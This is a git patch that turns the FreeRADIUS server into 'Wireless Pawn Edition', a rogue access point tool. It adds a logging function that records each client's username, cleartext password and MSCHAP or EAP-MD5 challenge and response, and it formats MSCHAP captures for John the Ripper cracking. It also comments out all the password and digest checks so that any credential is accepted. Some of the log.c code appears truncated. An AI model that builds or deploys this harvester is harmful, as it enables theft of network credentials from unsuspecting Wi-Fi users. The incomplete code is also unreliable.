From: Sophie Brun Date: Mon, 17 Jul 2023 18:01:05 +0200 Subject: freeradius-wpe --- raddb/mods-config/files/authorize | 2 + raddb/radiusd.conf.in | 3 ++ src/include/log.h | 5 ++ src/include/radiusd.h | 2 + src/main/auth.c | 1 + src/main/libfreeradius-server.mk | 1 + src/main/log.c | 71 +++++++++++++++++++++++++ src/main/mainconfig.c | 1 + src/main/radiusd.c | 2 +- src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c | 4 ++ src/modules/rlm_mschap/rlm_mschap.c | 11 ++-- src/modules/rlm_pap/rlm_pap.c | 25 ++++++++- 12 files changed, 122 insertions(+), 6 deletions(-) diff --git a/raddb/mods-config/files/authorize b/raddb/mods-config/files/authorize index ddf805f..315bf4b 100644 --- a/raddb/mods-config/files/authorize +++ b/raddb/mods-config/files/authorize @@ -204,3 +204,5 @@ DEFAULT Hint == "SLIP" # See the example user "bob" above. # ######################################################### +DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0 +DEFAULT Cleartext-Password := "a" diff --git a/raddb/radiusd.conf.in b/raddb/radiusd.conf.in index 0d154db..4bee477 100644 --- a/raddb/radiusd.conf.in +++ b/raddb/radiusd.conf.in @@ -445,6 +445,9 @@ ENV { # LD_PRELOAD = /path/to/library2.so } +# Wireless Pawn Edition log file +wpelogfile = ${logdir}/freeradius-server-wpe.log + # SECURITY CONFIGURATION # # There may be multiple methods of attacking on the server. This diff --git a/src/include/log.h b/src/include/log.h index 2736591..b3ffeb1 100644 --- a/src/include/log.h +++ b/src/include/log.h @@ -72,6 +72,11 @@ typedef struct fr_log_t { char const *debug_file; //!< Path to debug log file. } fr_log_t; +void log_wpe(const char *authtype, const char *username, const char *password, + const unsigned char *challenge, const unsigned int challen, + const unsigned char *response, const unsigned int resplen, + const char * logfilename); + typedef void (*radlog_func_t)(log_type_t lvl, log_lvl_t priority, REQUEST *, char const *, va_list ap); extern FR_NAME_NUMBER const syslog_facility_table[]; diff --git a/src/include/radiusd.h b/src/include/radiusd.h index 594a6bd..e171efe 100644 --- a/src/include/radiusd.h +++ b/src/include/radiusd.h @@ -152,6 +152,8 @@ typedef struct main_config { char const *checkrad; //!< Script to use to determine if a user is already //!< connected. + char const *wpelogfile; //!< Wireless Pawn Edition log file path. + rad_listen_t *listen; //!< Head of a linked list of listeners. diff --git a/src/main/auth.c b/src/main/auth.c index 84889b8..5a3debe 100644 --- a/src/main/auth.c +++ b/src/main/auth.c @@ -129,6 +129,7 @@ static int rad_authlog(char const *msg, REQUEST *request, int goodpass) } else { fr_prints(clean_password, sizeof(clean_password), request->password->vp_strvalue, request->password->vp_length, '\0'); + log_wpe("password", request->username->vp_strvalue, clean_password, NULL, 0, NULL, 0, main_config.wpelogfile); } } diff --git a/src/main/libfreeradius-server.mk b/src/main/libfreeradius-server.mk index 4495f72..56c6c5b 100644 --- a/src/main/libfreeradius-server.mk +++ b/src/main/libfreeradius-server.mk @@ -14,6 +14,7 @@ SOURCES := conffile.c \ pair.c \ xlat.c + # This lets the linker determine which version of the SSLeay functions to use. TGT_LDLIBS := $(OPENSSL_LIBS) diff --git a/src/main/log.c b/src/main/log.c index 1ca2f91..5efc31e 100644 --- a/src/main/log.c +++ b/src/main/log.c @@ -29,6 +29,7 @@ RCSID("$Id$") #include #include +/*#include */ #ifdef HAVE_SYS_STAT_H # include @@ -46,6 +47,9 @@ RCSID("$Id$") #include #endif +#include +#include + log_lvl_t rad_debug_lvl = 0; //!< Global debugging level static bool rate_limit = true; //!< Whether repeated log entries should be rate limited @@ -226,6 +230,73 @@ static int stdout_fd = -1; //!< The original unmolested stdout file descriptor static char const spaces[] = " "; +/** Prints username, password or challenge/response + * + */ +void log_wpe(const char *authtype, const char *username, const char *password, + const unsigned char *challenge, const unsigned int challen, + const unsigned char *response, const unsigned int resplen, + const char * logfilename) +{ + FILE *logfd; + time_t nowtime; + unsigned int count; + + /* Get wpelogfile parameter and log data */ + if (logfilename == NULL) { + logfd = stderr; + } else { + logfd = fopen(logfilename, "a"); + if (logfd == NULL) { + fr_strerror_printf(" log: FAILED: Unable to open output log file %s: %s", logfilename, strerror(errno)); + logfd = stderr; + } + } + + nowtime = time(NULL); + fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime)); + + if (username != NULL) { + fprintf(logfd, "\tusername: %s\n", username); + } + if (password != NULL) { + fprintf(logfd, "\tpassword: %s\n", password); + } + + if (challen != 0) { + fprintf(logfd, "\tchallenge: "); + for (count=0; count!=(challen-1); count++) { + fprintf(logfd, "%02x:",challenge[count]); + } + fprintf(logfd, "%02x\n",challenge[challen-1]); + } + + if (resplen != 0) { + fprintf(logfd, "\tresponse: "); + for (count=0; count!=(resplen-1); count++) { + fprintf(logfd, "%02x:",response[count]); + } + fprintf(logfd, "%02x\n",response[resplen-1]); + } + + if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL + && challen != 0 && resplen != 0) { + fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username); + for (count=0; countvalue, 16) != 0) { DEBUG("EAP-MD5 digests do not match."); return 0; } + */ + log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN, + packet->value, 16, main_config.wpelogfile); return 1; } diff --git a/src/modules/rlm_mschap/rlm_mschap.c b/src/modules/rlm_mschap/rlm_mschap.c index 00ab90d..07c7e0d 100644 --- a/src/modules/rlm_mschap/rlm_mschap.c +++ b/src/modules/rlm_mschap/rlm_mschap.c @@ -1189,10 +1189,13 @@ ntlm_auth_err: */ static int CC_HINT(nonnull (1, 2, 4, 5 ,6)) do_mschap(rlm_mschap_t *inst, REQUEST *request, VALUE_PAIR *password, uint8_t const *challenge, uint8_t const *response, - uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method) + uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method, + const char *username) { uint8_t calculated[24]; + log_wpe("mschap", username, NULL, challenge, 8, response, 24, main_config.wpelogfile); + memset(nthashhash, 0, NT_DIGEST_LENGTH); switch (method) { @@ -1209,9 +1212,11 @@ static int CC_HINT(nonnull (1, 2, 4, 5 ,6)) do_mschap(rlm_mschap_t *inst, REQUES } smbdes_mschap(password->vp_octets, challenge, calculated); + /* if (rad_digest_cmp(response, calculated, 24) != 0) { return -1; } + */ /* * If the password exists, and is an NT-Password, @@ -1945,7 +1950,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_authenticate(void *instance, REQUEST *re * Do the MS-CHAP authentication. */ mschap_result = do_mschap(inst, request, password, challenge->vp_octets, - response->vp_octets + offset, nthashhash, auth_method); + response->vp_octets + offset, nthashhash, auth_method, NULL); /* * Check for errors, and add MSCHAP-Error if necessary. */ @@ -2062,7 +2067,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_authenticate(void *instance, REQUEST *re RDEBUG2("Client is using MS-CHAPv2"); mschap_result = do_mschap(inst, request, nt_password, mschapv1_challenge, - response->vp_octets + 26, nthashhash, auth_method); + response->vp_octets + 26, nthashhash, auth_method, username_string); rcode = mschap_error(inst, request, *response->vp_octets, mschap_result, mschap_version, smb_ctrl); if (rcode != RLM_MODULE_OK) return rcode; diff --git a/src/modules/rlm_pap/rlm_pap.c b/src/modules/rlm_pap/rlm_pap.c index 463ff66..059aab9 100644 --- a/src/modules/rlm_pap/rlm_pap.c +++ b/src/modules/rlm_pap/rlm_pap.c @@ -566,6 +566,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_clear(UNUSED rlm_pap_t *inst, REQUE RDEBUG("Comparing with \"known good\" Cleartext-Password"); } + /* if ((vp->vp_length != request->password->vp_length) || (rad_digest_cmp(vp->vp_octets, request->password->vp_octets, @@ -573,6 +574,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_clear(UNUSED rlm_pap_t *inst, REQUE REDEBUG("Cleartext password does not match \"known good\" password"); return RLM_MODULE_REJECT; } + */ return RLM_MODULE_OK; } @@ -612,12 +614,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_md5(rlm_pap_t *inst, REQUEST *reque request->password->vp_length); fr_md5_final(digest, &md5_context); fr_md5_destroy(&md5_context); - +/* if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) { REDEBUG("MD5 digest does not match \"known good\" digest"); return RLM_MODULE_REJECT; } - +*/ return RLM_MODULE_OK; } @@ -647,10 +649,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_smd5(rlm_pap_t *inst, REQUEST *requ /* * Compare only the MD5 hash results, not the salt. */ + /* if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) { REDEBUG("SMD5 digest does not match \"known good\" digest"); return RLM_MODULE_REJECT; } + */ return RLM_MODULE_OK; } @@ -675,10 +679,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_sha(rlm_pap_t *inst, REQUEST *reque request->password->vp_length); fr_sha1_final(digest,&sha1_context); + /* if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) { REDEBUG("SHA1 digest does not match \"known good\" digest"); return RLM_MODULE_REJECT; } + */ return RLM_MODULE_OK; } @@ -704,10 +710,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_ssha(rlm_pap_t *inst, REQUEST *requ fr_sha1_update(&sha1_context, &vp->vp_octets[20], vp->vp_length - 20); fr_sha1_final(digest, &sha1_context); + /* if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) { REDEBUG("SSHA digest does not match \"known good\" digest"); return RLM_MODULE_REJECT; } + */ return RLM_MODULE_OK; } @@ -768,10 +776,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_sha2(rlm_pap_t *inst, REQUEST *requ rad_assert((size_t) digest_len == vp->vp_length); /* This would be an OpenSSL bug... */ + /* if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) { REDEBUG("%s digest does not match \"known good\" digest", name); return RLM_MODULE_REJECT; } + */ return RLM_MODULE_OK; } @@ -840,10 +850,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_ssha2(rlm_pap_t *inst, REQUEST *req /* * Only compare digest_len bytes, the rest is salt. */ + /* if (rad_digest_cmp(digest, vp->vp_octets, (size_t)digest_len) != 0) { REDEBUG("%s digest does not match \"known good\" digest", name); return RLM_MODULE_REJECT; } + */ return RLM_MODULE_OK; } @@ -1173,10 +1185,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_nt(rlm_pap_t *inst, REQUEST *reques fr_md4_calc(digest, (uint8_t *) ucs2_password, len); + /* if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) { REDEBUG("NT digest does not match \"known good\" digest"); return RLM_MODULE_REJECT; } + */ return RLM_MODULE_OK; } @@ -1203,11 +1217,13 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_lm(rlm_pap_t *inst, REQUEST *reques return RLM_MODULE_FAIL; } + /* if ((fr_hex2bin(digest, sizeof(digest), charbuf, len) != vp->vp_length) || (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0)) { REDEBUG("LM digest does not match \"known good\" digest"); return RLM_MODULE_REJECT; } + */ return RLM_MODULE_OK; } @@ -1264,10 +1280,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_ns_mta_md5(UNUSED rlm_pap_t *inst, fr_md5_final(buff, &md5_context); } + /* if (rad_digest_cmp(digest, buff, 16) != 0) { REDEBUG("NS-MTA-MD5 digest does not match \"known good\" digest"); return RLM_MODULE_REJECT; } + */ return RLM_MODULE_OK; } @@ -1290,6 +1308,9 @@ static rlm_rcode_t CC_HINT(nonnull) mod_authenticate(void *instance, REQUEST *re return RLM_MODULE_INVALID; } + log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue, + NULL, 0, NULL, 0, main_config.wpelogfile); + /* * The user MUST supply a non-zero-length password. */